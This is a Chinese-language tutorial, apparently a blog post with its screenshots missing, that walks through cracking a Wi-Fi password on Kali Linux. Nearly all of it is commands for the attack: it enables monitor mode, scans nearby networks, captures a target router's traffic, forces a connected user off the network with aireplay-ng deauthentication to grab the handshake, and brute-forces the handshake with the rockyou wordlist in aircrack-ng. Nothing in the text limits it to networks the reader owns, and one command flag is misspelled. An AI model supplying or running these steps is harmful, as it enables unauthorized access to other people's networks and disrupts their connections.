提前准备一个网卡
如果是vbox,那么将其加入到kali里面
使用
0、查看网卡是否存在
airmon-ng
如果出现wlan0(这个监听的网卡需要是新插入的),那么就开始破解吧
1、开启网卡监听
airmon-ng start wlan0
2、查看ifconfig
ifconfig
3、扫描wifi
airodump-ng wlan0mon
三秒不出现wifi的信息,那么拔出网卡从第0步开始重新弄一次
BSSID为wifi的MAC地址,
PWR为信号强弱程度,数值越小信号越强;
#DATA为数据量,越大使用的人就越多,
CH为信道频率(频道),
ESSID为wifi的名称
4、抓取某个信道
注意,信道频率会经常换,不能把上个步骤的数据下一次用
airodump-ng -w freedom -c 频道数 --bssid 地方路由器mac地址 wlan0mon -ignore-nefative-oneaa
freedom可以换成其他的路径加名称,这里用这个名以后,剩下抓取数据都会以这个名称开头,并且保存在当前的pwd下面
例如
airodump-ng -w freedom -c 1 --bssid 4E:81:50:7B:CA:7F wlan0mon -ignore-nefative-oneaa
这里仅有一个用户连这个wifi了,如果有多个用户,上面图最后会有好几行
我们接下来就是针对这个用户去完成密码破解操作,也就是至少要有一个用户连着这个wifi,我们让他断开,然后让他重新去连,因为我们在监听网络,那么我们就能监听到连接请求的数据包并保存,然后用密码本去一个个的正向哈希测试是否是密码
5、打开新的终端,指定某个用户的mac让其断线
aireplay-ng -0 2 -a 路由器mac地址 -c 用户的mac地址 wlan0mon
运行图
这时候回到监听的那个终端,等到有下面握手的过程就截获并保存成功了
6.0、复制kali自带的密码本到本路径,并解压
cp /usr/share/wordlists/rockyou.txt.gz ./
gzip -d ./rockyou.txt.gz
7、破解
aircrack-ng -w rockyou.txt freedom-*.ivs
如果如下图一样,正常运行了,就说明刚才捕获的包成功了
如果是下图,那么就没有抓取成功,需要重新抓包
如果尝试多个wifi时都用的freedom保存的,运行上述代码时不用担心,freedom-*.ivs虽然运行的是多个wifi,但不用担心抓取多个wifi的包,如果有多个wifi密码的包,在运行上面代码的时候会有提示,让你选择具体哪个wifi,如下图
上面为破解失败图,需要更换密码本,如下图